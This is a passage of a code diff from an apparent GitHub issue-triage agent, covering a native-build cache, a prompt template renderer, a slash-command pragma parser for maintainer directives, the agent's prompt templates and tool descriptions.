_atomic_copy(src, dst)
|
||||
copied.append(dst)
|
||||
return CacheHit(cache_dir=entry, files=tuple(copied))
|
||||
|
||||
# ---- capture (cache ← workspace) ----
|
||||
def capture(
|
||||
self,
|
||||
repo: str,
|
||||
key: str,
|
||||
native_dir: Path,
|
||||
*,
|
||||
source_workspace: str | None = None,
|
||||
commit: str | None = None,
|
||||
) -> Path | None:
|
||||
"""Atomically capture ``native_dir`` contents under ``key``.
|
||||
|
||||
Returns the final cache directory on store, ``None`` if there was
|
||||
nothing to capture or if another worker already populated the same
|
||||
key (idempotent under flock).
|
||||
"""
|
||||
node_files = sorted(native_dir.glob(_CACHED_NODE_GLOB))
|
||||
if not node_files:
|
||||
return None
|
||||
# Every companion must exist or the entry would be incomplete.
|
||||
for name in _CACHED_COMPANION_FILES:
|
||||
if not (native_dir / name).exists():
|
||||
return None
|
||||
|
||||
repo_root = self.repo_root(repo)
|
||||
repo_root.mkdir(parents=True, exist_ok=True)
|
||||
with _flock(self.lockfile(repo)):
|
||||
# TOCTOU recheck: another worker may have captured the same key
|
||||
# while we waited on the lock.
|
||||
if self.lookup(repo, key) is not None:
|
||||
return self.entry_dir(repo, key)
|
||||
|
||||
final = self.entry_dir(repo, key)
|
||||
staging = repo_root / f".{key}.tmp.{os.getpid()}"
|
||||
if staging.exists():
|
||||
shutil.rmtree(staging, ignore_errors=True)
|
||||
staging.mkdir(parents=True)
|
||||
try:
|
||||
# NOTE: capture uses COPY, not hardlink. Hardlinking a
|
||||
# slot-owned workspace file into the cache would preserve
|
||||
# the slot's ownership on the cached inode — defeating
|
||||
# the setgid `omp` model that lets other slots read it.
|
||||
# A copy creates a fresh inode owned by the orchestrator
|
||||
# (root) and inherits gid `omp` from the setgid 2770
|
||||
# cache root.
|
||||
for src in node_files:
|
||||
_atomic_copy(src, staging / src.name)
|
||||
for name in _CACHED_COMPANION_FILES:
|
||||
_atomic_copy(native_dir / name, staging / name)
|
||||
manifest = {
|
||||
"key": key,
|
||||
"target": target_triple(),
|
||||
"captured_at": time.time(),
|
||||
"source_workspace": source_workspace,
|
||||
"commit": commit,
|
||||
"node_files": [src.name for src in node_files],
|
||||
}
|
||||
(staging / _MANIFEST_FILENAME).write_text(
|
||||
json.dumps(manifest, indent=2, sort_keys=True), encoding="utf-8"
|
||||
)
|
||||
os.replace(staging, final)
|
||||
except Exception:
|
||||
shutil.rmtree(staging, ignore_errors=True)
|
||||
raise
|
||||
self._gc_locked(repo)
|
||||
return final
|
||||
|
||||
# ---- gc ----
|
||||
def gc(self, repo: str | None = None) -> int:
|
||||
"""Evict entries beyond per-repo or total caps.
|
||||
|
||||
``repo`` scopes to one repo when given; otherwise sweeps every repo
|
||||
directory under ``root``. Returns the count of evicted entries.
|
||||
"""
|
||||
if repo is not None:
|
||||
with _flock(self.lockfile(repo)):
|
||||
return self._gc_locked(repo)
|
||||
total = 0
|
||||
if not self.root.exists():
|
||||
return 0
|
||||
for child in self.root.iterdir():
|
||||
if not child.is_dir():
|
||||
continue
|
||||
# Reconstruct repo identifier from directory name (best-effort;
|
||||
# only used for lockfile path, not for any externally-visible
|
||||
# identifier).
|
||||
repo_name = child.name.replace("__", "/", 1)
|
||||
try:
|
||||
with _flock(self.lockfile(repo_name)):
|
||||
total += self._gc_locked(repo_name)
|
||||
except OSError as exc:
|
||||
log.warning("natives_cache gc skip", extra={"repo": child.name, "err": str(exc)})
|
||||
return total
|
||||
|
||||
def _gc_locked(self, repo: str) -> int:
|
||||
"""Caller MUST hold the per-repo flock."""
|
||||
repo_root = self.repo_root(repo)
|
||||
if not repo_root.exists():
|
||||
return 0
|
||||
entries: list[tuple[float, int, Path]] = []
|
||||
for child in repo_root.iterdir():
|
||||
if not child.is_dir():
|
||||
# Stale staging dirs (".<key>.tmp.<pid>") from a crashed
|
||||
# capture: drop them opportunistically.
|
||||
continue
|
||||
if child.name.startswith("."):
|
||||
shutil.rmtree(child, ignore_errors=True)
|
||||
continue
|
||||
manifest_path = child / _MANIFEST_FILENAME
|
||||
if not manifest_path.exists():
|
||||
# Incomplete entry — evict.
|
||||
shutil.rmtree(child, ignore_errors=True)
|
||||
continue
|
||||
try:
|
||||
manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
|
||||
captured_at = float(manifest.get("captured_at", 0.0))
|
||||
except (OSError, ValueError, json.JSONDecodeError):
|
||||
captured_at = manifest_path.stat().st_mtime
|
||||
size = _dir_size(child)
|
||||
entries.append((captured_at, size, child))
|
||||
entries.sort(key=lambda row: row[0]) # oldest first
|
||||
|
||||
evicted = 0
|
||||
# 1. Per-repo entry-count cap (drop oldest).
|
||||
while len(entries) > self.max_entries_per_repo:
|
||||
_, _, victim = entries.pop(0)
|
||||
shutil.rmtree(victim, ignore_errors=True)
|
||||
evicted += 1
|
||||
|
||||
# 2. Per-repo byte cap (drop oldest until under).
|
||||
if self.max_bytes > 0:
|
||||
total = sum(size for _, size, _ in entries)
|
||||
while total > self.max_bytes and len(entries) > 1:
|
||||
_, size, victim = entries.pop(0)
|
||||
shutil.rmtree(victim, ignore_errors=True)
|
||||
total -= size
|
||||
evicted += 1
|
||||
return evicted
|
||||
|
||||
|
||||
def _dir_size(path: Path) -> int:
|
||||
"""Sum of file sizes under ``path``. Symlinks counted as their lstat
|
||||
size (not the target). Errors swallowed — GC is best-effort."""
|
||||
total = 0
|
||||
for root, _dirs, files in os.walk(path):
|
||||
for name in files:
|
||||
try:
|
||||
total += os.lstat(os.path.join(root, name)).st_size
|
||||
except OSError:
|
||||
pass
|
||||
return total
|
||||
|
||||
|
||||
__all__ = [
|
||||
"CACHE_KEY_PATHS",
|
||||
"CacheHit",
|
||||
"NativesCache",
|
||||
"compute_key",
|
||||
"target_triple",
|
||||
]
|
||||
@@ -0,0 +1,355 @@
|
||||
"""Prompt template loader + renderer.
|
||||
|
||||
Templates use a tiny mustache-style `{{path.to.value}}` placeholder. We do not
|
||||
import a real template engine: the substitution rules are deliberately
|
||||
restrictive so a malformed prompt is impossible to render with surprising
|
||||
side-effects.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
import tomllib
|
||||
from collections.abc import Mapping
|
||||
from functools import cache
|
||||
from importlib import resources
|
||||
from typing import Any
|
||||
|
||||
from robomp.github_client import CommentInfo, IssueInfo, RepoInfo
|
||||
from robomp.sandbox import Workspace
|
||||
|
||||
_PLACEHOLDER = re.compile(r"\{\{\s*([a-zA-Z0-9_.]+)\s*\}\}")
|
||||
|
||||
|
||||
def _lookup(path: str, scope: Mapping[str, Any]) -> str:
|
||||
parts = path.split(".")
|
||||
value: Any = scope
|
||||
for part in parts:
|
||||
if isinstance(value, Mapping):
|
||||
value = value.get(part)
|
||||
else:
|
||||
value = getattr(value, part, None)
|
||||
if value is None:
|
||||
return ""
|
||||
if isinstance(value, (list, tuple)):
|
||||
return ", ".join(str(item) for item in value)
|
||||
return str(value)
|
||||
|
||||
|
||||
def render(template: str, scope: Mapping[str, Any]) -> str:
|
||||
return _PLACEHOLDER.sub(lambda m: _lookup(m.group(1), scope), template)
|
||||
|
||||
|
||||
@cache
|
||||
def _load(name: str) -> str:
|
||||
return resources.files("robomp.prompts").joinpath(name).read_text(encoding="utf-8")
|
||||
|
||||
|
||||
@cache
|
||||
def _load_toml(name: str) -> Mapping[str, Any]:
|
||||
data = tomllib.loads(_load(name))
|
||||
if not isinstance(data, Mapping):
|
||||
raise ValueError(f"prompt data file {name!r} must contain a TOML table")
|
||||
return data
|
||||
|
||||
|
||||
def _require_mapping(value: Any, context: str) -> Mapping[str, Any]:
|
||||
if not isinstance(value, Mapping):
|
||||
raise ValueError(f"{context} must be a table")
|
||||
return value
|
||||
|
||||
|
||||
def _require_nonempty_str(value: Any, context: str) -> str:
|
||||
if not isinstance(value, str) or not value.strip():
|
||||
raise ValueError(f"{context} must be a non-empty string")
|
||||
return value
|
||||
|
||||
|
||||
def seed_phases(task_kind: str) -> list[dict[str, Any]]:
|
||||
raw_phases = _load_toml("todo_phases.toml").get(task_kind, [])
|
||||
if not isinstance(raw_phases, list):
|
||||
raise ValueError(f"todo_phases.toml[{task_kind!r}] must be a list of phases")
|
||||
|
||||
phases: list[dict[str, Any]] = []
|
||||
for phase_index, raw_phase in enumerate(raw_phases):
|
||||
phase = _require_mapping(raw_phase, f"todo_phases.toml[{task_kind!r}][{phase_index}]")
|
||||
name = _require_nonempty_str(
|
||||
phase.get("name"),
|
||||
f"todo_phases.toml[{task_kind!r}][{phase_index}].name",
|
||||
)
|
||||
raw_tasks = phase.get("tasks")
|
||||
if not isinstance(raw_tasks, list) or not raw_tasks:
|
||||
raise ValueError(f"todo_phases.toml[{task_kind!r}][{phase_index}].tasks must be a non-empty list")
|
||||
tasks = [
|
||||
_require_nonempty_str(
|
||||
task,
|
||||
f"todo_phases.toml[{task_kind!r}][{phase_index}].tasks[{task_index}]",
|
||||
)
|
||||
for task_index, task in enumerate(raw_tasks)
|
||||
]
|
||||
phases.append({"name": name, "tasks": tasks})
|
||||
return phases
|
||||
|
||||
|
||||
def _host_tool_entry(tool_name: str) -> Mapping[str, Any]:
|
||||
return _require_mapping(
|
||||
_load_toml("host_tools.toml").get(tool_name),
|
||||
f"host_tools.toml[{tool_name!r}]",
|
||||
)
|
||||
|
||||
|
||||
def host_tool_description(tool_name: str) -> str:
|
||||
return _require_nonempty_str(
|
||||
_host_tool_entry(tool_name).get("description"),
|
||||
f"host_tools.toml[{tool_name!r}].description",
|
||||
)
|
||||
|
||||
|
||||
def host_tool_parameter_description(tool_name: str, parameter_name: str) -> str:
|
||||
parameters = _require_mapping(
|
||||
_host_tool_entry(tool_name).get("parameters"),
|
||||
f"host_tools.toml[{tool_name!r}].parameters",
|
||||
)
|
||||
return _require_nonempty_str(
|
||||
parameters.get(parameter_name),
|
||||
f"host_tools.toml[{tool_name!r}].parameters[{parameter_name!r}]",
|
||||
)
|
||||
|
||||
|
||||
def classify_next_step(primary: str) -> str:
|
||||
steps = _require_mapping(
|
||||
_host_tool_entry("classify_issue").get("next_steps"),
|
||||
"host_tools.toml['classify_issue'].next_steps",
|
||||
)
|
||||
return _require_nonempty_str(
|
||||
steps.get(primary),
|
||||
f"host_tools.toml['classify_issue'].next_steps[{primary!r}]",
|
||||
)
|
||||
|
||||
|
||||
def system_append(*, repo: RepoInfo, issue: IssueInfo, workspace: Workspace) -> str:
|
||||
return render(_load("system_append.md"), {"repo": repo, "issue": issue, "workspace": workspace})
|
||||
|
||||
|
||||
def kickoff(*, repo: RepoInfo, issue: IssueInfo, workspace: Workspace) -> str:
|
||||
return render(_load("kickoff_issue.md"), {"repo": repo, "issue": issue, "workspace": workspace})
|
||||
|
||||
|
||||
def resume_triage(*, repo: RepoInfo, issue: IssueInfo, workspace: Workspace) -> str:
|
||||
"""Resume prompt for a `triage_issue` task whose omp session already exists."""
|
||||
return render(_load("resume_triage.md"), {"repo": repo, "issue": issue, "workspace": workspace})
|
||||
|
||||
|
||||
def completion_reminder(*, repo: RepoInfo, issue: IssueInfo, workspace: Workspace) -> str:
|
||||
"""Reminder injected when a triage turn ends before a terminal tool fired."""
|
||||
return render(_load("completion_reminder.md"), {"repo": repo, "issue": issue, "workspace": workspace})
|
||||
|
||||
|
||||
def _render_thread(messages: tuple) -> str:
|
||||
"""Render a `tuple[ThreadMessage, ...]` as a markdown block for prompt embed.
|
||||
|
||||
Duck-typed: any object with `.kind / .author / .body / .created_at` and
|
||||
optional `.path / .line / .state` works. Kept here (not in worker.py) so
|
||||
persona owns the prompt-shape.
|
||||
"""
|
||||
if not messages:
|
||||
return "(no prior conversation)"
|
||||
parts: list[str] = []
|
||||
for m in messages:
|
||||
kind = getattr(m, "kind", "comment")
|
||||
author = getattr(m, "author", "") or "unknown"
|
||||
body = getattr(m, "body", "") or ""
|
||||
ts = getattr(m, "created_at", "") or ""
|
||||
if kind in ("issue_body", "pr_body"):
|
||||
header = f"### @{author} — {'PR body' if kind == 'pr_body' else 'issue body'}"
|
||||
elif kind == "review_comment":
|
||||
path = getattr(m, "path", None)
|
||||
line = getattr(m, "line", None)
|
||||
anchor = f"`{path}`" + (f":L{line}" if isinstance(line, int) else "")
|
||||
header = f"### @{author} — review comment on {anchor}"
|
||||
elif kind == "review":
|
||||
state = getattr(m, "state", None) or "COMMENTED"
|
||||
header = f"### @{author} — review ({state})"
|
||||
else:
|
||||
header = f"### @{author} — comment"
|
||||
if ts:
|
||||
header += f" *({ts})*"
|
||||
parts.append(header)
|
||||
parts.append("")
|
||||
parts.append(body.rstrip())
|
||||
parts.append("")
|
||||
return "\n".join(parts).rstrip()
|
||||
|
||||
|
||||
def kickoff_directive(
|
||||
*,
|
||||
repo: RepoInfo,
|
||||
issue: IssueInfo,
|
||||
workspace: Workspace,
|
||||
directive: Any,
|
||||
) -> str:
|
||||
"""Kickoff for an untriaged issue that arrived via a maintainer mention.
|
||||
|
||||
`directive` is duck-typed to anything with `body`, `author`, and `thread`
|
||||
attributes (see `worker.DirectiveInfo`). Imported lazily to avoid a
|
||||
persona → worker circular dependency.
|
||||
"""
|
||||
return render(
|
||||
_load("kickoff_directive.md"),
|
||||
{
|
||||
"repo": repo,
|
||||
"issue": issue,
|
||||
"workspace": workspace,
|
||||
"directive": {"body": directive.body, "author": directive.author},
|
||||
"thread": _render_thread(getattr(directive, "thread", ()) or ()),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
def _inbound_scope(issue: IssueInfo, pr_number: int | None) -> dict[str, Any]:
|
||||
"""Describe the thread the inbound webhook arrived on.
|
||||
|
||||
For PR conversations and review comments `pr_number` is the PR; for
|
||||
regular issue comments it's None and we fall back to the issue. The
|
||||
`kind` field lets prompts say "PR" or "issue" without branching in the
|
||||
template engine.
|
||||
"""
|
||||
if pr_number is not None:
|
||||
return {"kind": "PR", "number": pr_number}
|
||||
return {"kind": "issue", "number": issue.number}
|
||||
|
||||
|
||||
def _origin_scope(issue: IssueInfo) -> dict[str, Any]:
|
||||
if issue.is_pull_request:
|
||||
return {"description": "originating issue unknown; handling this PR directly"}
|
||||
return {"description": f"originating issue #{issue.number}"}
|
||||
|
||||
|
||||
def followup_comment(
|
||||
*,
|
||||
repo: RepoInfo,
|
||||
issue: IssueInfo,
|
||||
comment: CommentInfo,
|
||||
workspace: Workspace,
|
||||
pr_status: str,
|
||||
pr_number: int | None = None,
|
||||
) -> str:
|
||||
return render(
|
||||
_load("followup_comment.md"),
|
||||
{
|
||||
"repo": repo,
|
||||
"issue": issue,
|
||||
"workspace": workspace,
|
||||
"comment": comment,
|
||||
"state": {"pr_status": pr_status},
|
||||
"inbound": _inbound_scope(issue, pr_number),
|
||||
"origin": _origin_scope(issue),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
def directive(
|
||||
*,
|
||||
repo: RepoInfo,
|
||||
issue: IssueInfo,
|
||||
comment: CommentInfo,
|
||||
workspace: Workspace,
|
||||
directive: Any,
|
||||
pr_status: str,
|
||||
pr_number: int | None = None,
|
||||
) -> str:
|
||||
"""Follow-up flavor for a comment that is a maintainer directive."""
|
||||
return render(
|
||||
_load("directive.md"),
|
||||
{
|
||||
"repo": repo,
|
||||
"issue": issue,
|
||||
"workspace": workspace,
|
||||
"comment": comment,
|
||||
"directive": {"body": directive.body, "author": directive.author},
|
||||
"thread": _render_thread(getattr(directive, "thread", ()) or ()),
|
||||
"state": {"pr_status": pr_status},
|
||||
"inbound": _inbound_scope(issue, pr_number),
|
||||
"origin": _origin_scope(issue),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
def followup_review(
|
||||
*,
|
||||
repo: RepoInfo,
|
||||
workspace: Workspace,
|
||||
pr_number: int,
|
||||
comment_author: str,
|
||||
comment_body: str,
|
||||
comment_path: str,
|
||||
comment_line_range: str,
|
||||
) -> str:
|
||||
return render(
|
||||
_load("followup_review.md"),
|
||||
{
|
||||
"repo": repo,
|
||||
"workspace": workspace,
|
||||
"pr": {"number": pr_number},
|
||||
"comment": {
|
||||
"author": comment_author,
|
||||
"body": comment_body,
|
||||
"path": comment_path,
|
||||
"line_range": comment_line_range,
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
def unable_to_reproduce_comment(*, diagnosis: str, info_needed: str) -> str:
|
||||
return render(
|
||||
_load("unable_to_reproduce_comment.md"),
|
||||
{"diagnosis": diagnosis, "info_needed": info_needed},
|
||||
)
|
||||
|
||||
|
||||
def finalized_issue_comment() -> str:
|
||||
return _load("finalized_issue_comment.md").strip()
|
||||
|
||||
|
||||
def finalized_pr_comment() -> str:
|
||||
return _load("finalized_pr_comment.md").strip()
|
||||
|
||||
|
||||
def bare_mention_reply() -> str:
|
||||
return "What would you like me to do?"
|
||||
|
||||
|
||||
def question_autoclose_suffix(hours: float) -> str:
|
||||
"""Render the 👎-to-keep-open suffix appended to the bot's question answers.
|
||||
|
||||
`hours` is rendered without trailing zeros for whole values (e.g. `4`
|
||||
rather than `4.0`); fractional windows render with one decimal.
|
||||
"""
|
||||
if float(hours).is_integer():
|
||||
rendered = str(int(hours))
|
||||
else:
|
||||
rendered = f"{hours:g}"
|
||||
return render(_load("question_autoclose_suffix.md").rstrip(), {"hours": rendered})
|
||||
|
||||
|
||||
__all__ = [
|
||||
"classify_next_step",
|
||||
"directive",
|
||||
"finalized_issue_comment",
|
||||
"finalized_pr_comment",
|
||||
"followup_comment",
|
||||
"followup_review",
|
||||
"host_tool_description",
|
||||
"host_tool_parameter_description",
|
||||
"kickoff",
|
||||
"kickoff_directive",
|
||||
"render",
|
||||
"completion_reminder",
|
||||
"resume_triage",
|
||||
"seed_phases",
|
||||
"system_append",
|
||||
"unable_to_reproduce_comment",
|
||||
"bare_mention_reply",
|
||||
"question_autoclose_suffix",
|
||||
]
|
||||
@@ -0,0 +1,181 @@
|
||||
"""Slash-command pragmas for maintainer directives.
|
||||
|
||||
A *pragma* is a piece of structured metadata a maintainer attaches to a
|
||||
directive comment to steer the agent run. The wire syntax is slash-commands
|
||||
on their own line (chatops convention; identical surface to Slack / Discord
|
||||
/ Probot):
|
||||
|
||||
```
|
||||
@robomp-bot /model gpt /thinking low
|
||||
fix the off-by-one in foo()
|
||||
```
|
||||
|
||||
Or stacked:
|
||||
|
||||
```
|
||||
@robomp-bot
|
||||
/model gpt
|
||||
/thinking low
|
||||
fix the off-by-one
|
||||
```
|
||||
|
||||
Either `/key value` or `/key=value` form is accepted. A line is consumed
|
||||
**only** when every whitespace-separated token on it is a valid slash
|
||||
command — that way an inline `/path/to/file` reference in prose never
|
||||
accidentally tokenizes. Consumed lines are stripped from the body before the
|
||||
agent ever sees them. Non-directive comments (random users) carry no
|
||||
pragmas; this whole surface only applies once the comment is already trusted
|
||||
as a directive (reviewer-bot or maintainer-mention).
|
||||
|
||||
Supported keys (today):
|
||||
|
||||
- `/model <alias>` — pick the first id in `ROBOMP_MODEL` whose model id
|
||||
contains `<alias>` (case-insensitive). Falls back to the normal random
|
||||
pool selection if no member matches.
|
||||
- `/thinking <level>` — override `ROBOMP_THINKING` for this run. Accepts
|
||||
`off|none|no`, `lo|low`, `med|medium`, `hi|high`, `xhi|xhigh`
|
||||
(case-insensitive); anything else is ignored.
|
||||
|
||||
Parser semantics:
|
||||
|
||||
- Pure-command lines are stripped from the body.
|
||||
- Mixed lines (commands + prose) are NOT consumed: the line stays verbatim
|
||||
and no pragmas are extracted from it. Put commands on their own line.
|
||||
- Duplicate keys keep insertion order; callers decide last-vs-first wins.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
from typing import Literal
|
||||
|
||||
ThinkingLevel = Literal["off", "low", "medium", "high", "xhigh"]
|
||||
|
||||
# Key = ascii lowercase / digit / dash / underscore, must start with a letter.
|
||||
# The value (when using `/key=value` form) runs to end-of-token.
|
||||
_KEY_RE = re.compile(r"^[a-z][a-z0-9_-]*$", re.IGNORECASE)
|
||||
|
||||
|
||||
def _parse_command_line(line: str) -> tuple[tuple[str, str], ...] | None:
|
||||
"""Parse one line as a sequence of slash commands.
|
||||
|
||||
Returns the parsed `(key, value)` pairs, or `None` if the line is not a
|
||||
pure command line (mixed content, malformed, or empty after trim).
|
||||
"""
|
||||
stripped = line.strip()
|
||||
if not stripped or not stripped.startswith("/"):
|
||||
return None
|
||||
tokens = stripped.split()
|
||||
pairs: list[tuple[str, str]] = []
|
||||
i = 0
|
||||
while i < len(tokens):
|
||||
tok = tokens[i]
|
||||
if not tok.startswith("/") or len(tok) < 2:
|
||||
return None
|
||||
# `/key=value` form lives inside one token.
|
||||
if "=" in tok:
|
||||
key, _, value = tok[1:].partition("=")
|
||||
if not _KEY_RE.match(key) or not value:
|
||||
return None
|
||||
pairs.append((key.lower(), value))
|
||||
i += 1
|
||||
continue
|
||||
# `/key value` form needs the next token as value, which must not
|
||||
# itself be a command (otherwise `/key` had no value).
|
||||
key = tok[1:]
|
||||
if not _KEY_RE.match(key):
|
||||
return None
|
||||
if i + 1 >= len(tokens) or tokens[i + 1].startswith("/"):
|
||||
return None
|
||||
pairs.append((key.lower(), tokens[i + 1]))
|
||||
i += 2
|
||||
return tuple(pairs) if pairs else None
|
||||
|
||||
|
||||
def parse_pragmas(body: str) -> tuple[str, tuple[tuple[str, str], ...]]:
|
||||
"""Split `body` into (cleaned_body, pragmas).
|
||||
|
||||
Scans line-by-line. Pure command lines are removed; everything else is
|
||||
preserved verbatim, including blank lines between content. Leading and
|
||||
trailing whitespace on the final body is trimmed.
|
||||
"""
|
||||
if not body:
|
||||
return body, ()
|
||||
found: list[tuple[str, str]] = []
|
||||
kept: list[str] = []
|
||||
# `splitlines(keepends=True)` preserves the original line endings so we
|
||||
# don't accidentally normalize CRLF.
|
||||
for line in body.splitlines(keepends=True):
|
||||
# Strip the trailing newline only for parsing; we'll drop the whole
|
||||
# line on a match either way.
|
||||
bare = line.rstrip("\r\n")
|
||||
commands = _parse_command_line(bare)
|
||||
if commands is None:
|
||||
kept.append(line)
|
||||
continue
|
||||
found.extend(commands)
|
||||
cleaned = "".join(kept).strip("\r\n")
|
||||
return cleaned, tuple(found)
|
||||
|
||||
|
||||
def pragma_value(pragmas: tuple[tuple[str, str], ...], key: str) -> str | None:
|
||||
"""Return the last value for `key` (last-wins), or None if absent."""
|
||||
target = key.lower()
|
||||
result: str | None = None
|
||||
for k, v in pragmas:
|
||||
if k == target:
|
||||
result = v
|
||||
return result
|
||||
|
||||
|
||||
def resolve_model_alias(alias: str, pool: tuple[str, ...]) -> str | None:
|
||||
"""Case-insensitive match of `alias` against each member of `pool`.
|
||||
|
||||
Precedence: full-id exact > short-name-after-slash exact > substring.
|
||||
Returns the first match in pool order, or None if nothing matches.
|
||||
"""
|
||||
needle = alias.strip().lower()
|
||||
if not needle:
|
||||
return None
|
||||
exact: str | None = None
|
||||
partial: str | None = None
|
||||
for model in pool:
|
||||
lower = model.lower()
|
||||
if lower == needle:
|
||||
return model
|
||||
if exact is None and lower.rsplit("/", 1)[-1] == needle:
|
||||
exact = model
|
||||
if partial is None and needle in lower:
|
||||
partial = model
|
||||
return exact or partial
|
||||
|
||||
|
||||
# Spelling aliases for the `/thinking` pragma. Lowercased; whitespace-stripped
|
||||
# input is looked up directly.
|
||||
_THINKING_ALIASES: dict[str, ThinkingLevel] = {
|
||||
"off": "off",
|
||||
"none": "off",
|
||||
"no": "off",
|
||||
"lo": "low",
|
||||
"low": "low",
|
||||
"med": "medium",
|
||||
"medium": "medium",
|
||||
"hi": "high",
|
||||
"high": "high",
|
||||
"xhi": "xhigh",
|
||||
"xhigh": "xhigh",
|
||||
}
|
||||
|
||||
|
||||
def resolve_thinking_level(value: str) -> ThinkingLevel | None:
|
||||
"""Normalize a thinking pragma to a canonical level, or None if unknown."""
|
||||
return _THINKING_ALIASES.get(value.strip().lower())
|
||||
|
||||
|
||||
__all__ = [
|
||||
"ThinkingLevel",
|
||||
"parse_pragmas",
|
||||
"pragma_value",
|
||||
"resolve_model_alias",
|
||||
"resolve_thinking_level",
|
||||
]
|
||||
@@ -0,0 +1,14 @@
|
||||
You ended your turn before finishing.
|
||||
|
||||
Issue: {{repo.full_name}}#{{issue.number}} — {{issue.title}}
|
||||
Branch: `{{workspace.branch}}`
|
||||
|
||||
You classified this issue and reproduced the bug, but did NOT reach a terminal action. Acceptable terminal actions for a `bug` / `documentation` issue are exactly one of:
|
||||
|
||||
1. `gh_push_branch` + `gh_open_pr` — you committed the fix, pushed the branch, and opened a PR.
|
||||
2. `mark_unable_to_reproduce` — you genuinely cannot reproduce or fix and need maintainer input.
|
||||
3. `abort_task` — unrecoverable environment failure.
|
||||
|
||||
Review your TodoList and the prior tool calls, then continue from where you stopped. Do NOT re-classify, do NOT re-post the same preamble comment. If your fix is already drafted in the worktree, commit, push, and open the PR now. If you have not yet edited any source files, do the fix and continue through to PR.
|
||||
|
||||
You MUST end this turn by calling one of the three terminal tools listed above.
|
||||
@@ -0,0 +1,40 @@
|
||||
# Directive on {{repo.full_name}}#{{inbound.number}} ({{inbound.kind}})
|
||||
|
||||
**@{{directive.author}}** posted an authoritative directive on this thread ({{origin.description}}) — either a maintainer who tagged you or a configured reviewer bot. Treat as binding. OVERRIDES any prior plan or seed todos.
|
||||
|
||||
Current PR state: `{{state.pr_status}}`.
|
||||
|
||||
---
|
||||
|
||||
## Prior conversation
|
||||
|
||||
{{thread}}
|
||||
|
||||
---
|
||||
|
||||
## Directive from @{{directive.author}} ({{comment.created_at}})
|
||||
|
||||
{{directive.body}}
|
||||
|
||||
---
|
||||
|
||||
## What to do
|
||||
|
||||
Read the thread first — reviewer bots (e.g. `chatgpt-codex-connector`) often reference earlier comments by line, so the directive is a delta on established context.
|
||||
|
||||
Then branch on request type:
|
||||
|
||||
- **Code change** → commit on `{{workspace.branch}}`. NEVER open a second PR; push to this branch. `gh_push_branch` / `gh_open_pr` run `bun run fix` + `bun check` before contacting the remote — you do NOT. After pushing, reply with ONE `gh_post_comment` summarizing the fix, one line per concrete change. Directive bundles multiple issues (e.g. several inline review comments)? Address each and group them in the reply.
|
||||
- **Question / clarification** → one `gh_post_comment`. No code change.
|
||||
- **Explicit stop / drop this** → one ack comment, then halt.
|
||||
- **Ambiguous** → exactly one clarifying question, then stop. NEVER guess.
|
||||
|
||||
---
|
||||
|
||||
You MAY amend or replace prior commits as long as final `{{workspace.branch}}` state matches the directive.
|
||||
|
||||
All side effects via `gh_*` host tools. NEVER shell out to `gh` or `git push`.
|
||||
|
||||
`classify_issue` and `set_issue_labels` are unavailable here — the originating issue is already triaged.
|
||||
|
||||
Terse. Technical. No emoji.
|
||||
@@ -0,0 +1 @@
|
||||
This issue is closed. If the bug is back, please reopen and I'll triage again from scratch.
|
||||
@@ -0,0 +1 @@
|
||||
This PR has been closed/merged — opening a fresh fix for further changes is recommended. If this is a regression, reopen the original issue and I'll triage from scratch.
|
||||
@@ -0,0 +1,18 @@
|
||||
# Follow-up on {{repo.full_name}}#{{inbound.number}} ({{inbound.kind}})
|
||||
|
||||
Thread context: {{origin.description}}. PR state: `{{state.pr_status}}`.
|
||||
|
||||
## New comment by @{{comment.author}} ({{comment.created_at}})
|
||||
|
||||
{{comment.body}}
|
||||
|
||||
---
|
||||
|
||||
Decide what to do:
|
||||
|
||||
- **New repro info?** Re-run via `repro_record`, then `gh_post_comment` with the outcome.
|
||||
- **PR change requested?** Amend `{{workspace.branch}}` and push; NEVER open a second PR. Reply with a short `gh_post_comment` naming what changed.
|
||||
- **Confirmation or unrelated question?** Reply with one `gh_post_comment`. Leave code untouched.
|
||||
- **Bot author or no actionable content?** No-op.
|
||||
|
||||
You MUST reuse the recorded session state. NEVER restart from scratch.
|
||||
@@ -0,0 +1,14 @@
|
||||
# PR review on {{repo.full_name}}#{{pr.number}}
|
||||
|
||||
A review comment landed on the PR you opened.
|
||||
|
||||
## @{{comment.author}} on `{{comment.path}}`{{comment.line_range}}
|
||||
|
||||
{{comment.body}}
|
||||
|
||||
---
|
||||
|
||||
- You MUST read the diff context around the cited line range before acting.
|
||||
- Address the comment, then push a follow-up commit on `{{workspace.branch}}`.
|
||||
- Reply with a single `gh_post_comment` summarizing what changed — one line per concrete fix.
|
||||
- Reviewer asking for clarification, not a change? Answer with `gh_post_comment` and NEVER touch the code.
|
||||
@@ -0,0 +1,69 @@
|
||||
[gh_post_comment]
|
||||
description = "Post a comment on the inbound thread (PR for PR conversations/reviews, originating issue otherwise). Pass `number` ONLY to post elsewhere."
|
||||
|
||||
[gh_post_comment.parameters]
|
||||
body = "Markdown comment body."
|
||||
number = "Optional issue/PR override. Defaults to the inbound thread."
|
||||
|
||||
[gh_push_branch]
|
||||
description = "Push the workspace branch to origin. Pre-publish gate (when the repo defines them): `bun run fix` → auto-commit any formatter diff as `style: bun run fix` → `bun check`. On `bun check` failure, fix the cause and retry. Pre-existing breakage on `main` against the same paths NOT caused by your diff → retry with `skip_checks=true` and document the bypass in the follow-up comment. Dirty-tree gate runs unconditionally."
|
||||
|
||||
[gh_push_branch.parameters]
|
||||
branch = "Optional branch override; defaults to the workspace branch."
|
||||
skip_checks = "Bypass `bun run fix` + `bun check`. Use ONLY after verifying (e.g. `git diff origin/<default>..HEAD` against the failing paths) the failure exists on `main` and is NOT caused by your diff. Dirty-tree gate still runs — commit everything first."
|
||||
|
||||
[gh_open_pr]
|
||||
description = "Open a PR from the workspace branch using the four-section body template. Same pre-publish gate as `gh_push_branch`: `bun run fix` → auto-commit formatter diff as `style: bun run fix` → `bun check`. On failure, fix and retry. Pre-existing `main` breakage NOT caused by your diff → `skip_checks=true` and document the bypass in the PR's `## Verification` section."
|
||||
|
||||
[gh_open_pr.parameters]
|
||||
